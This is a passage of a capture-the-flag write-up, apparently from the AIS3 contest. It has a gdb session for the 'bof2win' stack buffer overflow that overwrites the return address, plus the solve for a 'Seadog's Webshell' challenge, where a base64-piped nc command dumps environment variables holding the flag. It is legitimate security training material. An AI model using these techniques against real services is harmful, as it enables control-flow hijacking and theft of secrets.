<gets@plt> 0x0000000000401309 <+101>: lea -0x10(%rbp),%rax 0x000000000040130d <+105>: mov %rax,%rsi 0x0000000000401310 <+108>: lea 0xd12(%rip),%rdi # 0x402029 0x0000000000401317 <+115>: mov $0x0,%eax 0x000000000040131c <+120>: call 0x4010d0 <printf@plt> 0x0000000000401321 <+125>: mov $0x0,%eax 0x0000000000401326 <+130>: leave => 0x0000000000401327 <+131>: ret End of assembler dump. (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0000000000000000 in ?? () (gdb) run < exp The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/c/Downloads/bof2win/share/bof2win < exp [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@! Breakpoint 2, 0x0000000000401326 in main () (gdb) c Continuing. Breakpoint 3, 0x0000000000401327 in main () (gdb) info frame Stack level 0, frame at 0x7fffffffdf28: rip = 0x401327 in main; saved rip = 0x7f0000401216 Arglist at 0x4646464645454545, args: Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30 Saved registers: rip at 0x7fffffffdf28 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007f0000401216 in ?? () (gdb) Quit (gdb) run < exp The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/c/Downloads/bof2win/share/bof2win < exp [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@! Breakpoint 2, 0x0000000000401326 in main () (gdb) info registers rax 0x0 0 rbx 0x0 0 rcx 0x7ffff7e97a37 140737352661559 rdx 0x0 0 rsi 0x7fffffffbdf0 140737488338416 rdi 0x7fffffffbcd0 140737488338128 rbp 0x7fffffffdf20 0x7fffffffdf20 rsp 0x7fffffffdf10 0x7fffffffdf10 r8 0x24 36 r9 0x7fffffff 2147483647 r10 0x0 0 r11 0x246 582 r12 0x7fffffffe038 140737488347192 r13 0x4012a4 4199076 r14 0x0 0 r15 0x7ffff7ffd040 140737354125376 rip 0x401326 0x401326 <main+130> eflags 0x202 [ IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) info frame Stack level 0, frame at 0x7fffffffdf30: rip = 0x401326 in main; saved rip = 0x401216 Arglist at 0x7fffffffdf20, args: Locals at 0x7fffffffdf20, Previous frame's sp is 0x7fffffffdf30 Saved registers: rbp at 0x7fffffffdf20, rip at 0x7fffffffdf28 (gdb) c Continuing. Breakpoint 3, 0x0000000000401327 in main () (gdb) info registers rax 0x0 0 rbx 0x0 0 rcx 0x7ffff7e97a37 140737352661559 rdx 0x0 0 rsi 0x7fffffffbdf0 140737488338416 rdi 0x7fffffffbcd0 140737488338128 rbp 0x4646464645454545 0x4646464645454545 rsp 0x7fffffffdf28 0x7fffffffdf28 r8 0x24 36 r9 0x7fffffff 2147483647 r10 0x0 0 r11 0x246 582 r12 0x7fffffffe038 140737488347192 r13 0x4012a4 4199076 r14 0x0 0 r15 0x7ffff7ffd040 140737354125376 rip 0x401327 0x401327 <main+131> eflags 0x202 [ IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) c Continuing. AIS3{test} Program received signal SIGSEGV, Segmentation fault. 0x0000000000000000 in ?? () (gdb) ``` ::: ``` AIS3{Re@1_B0F_m4st3r!!} ``` ## Seadog's Webshell [498 pts] ### 題目 ```shell #!/bin/sh exec 2>/dev/null base64 | cat ``` ### Solve ```shell ch@CHSMB tmp % echo -n "printenv" | base64 -d | nc chals1.ais3.org 12369 REMOTE_HOST=::ffff:10.113.193.33 HOSTNAME=06e23c9f6627 PWD=/ _=/usr/sbin/printenv HOME=/root LANG=en_US.UTF-8 FLAG=AIS3{ZXNjYXBpbmdfYmFzZTY0X3dpdGhfZW9m} SHLVL=1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ``` --- ## Scoreboard :::spoiler ![](https://i.imgur.com/HH8XJKy.jpg) ::: --- https://github.com/ashutosh1206/Crypton https://cryptohack.org/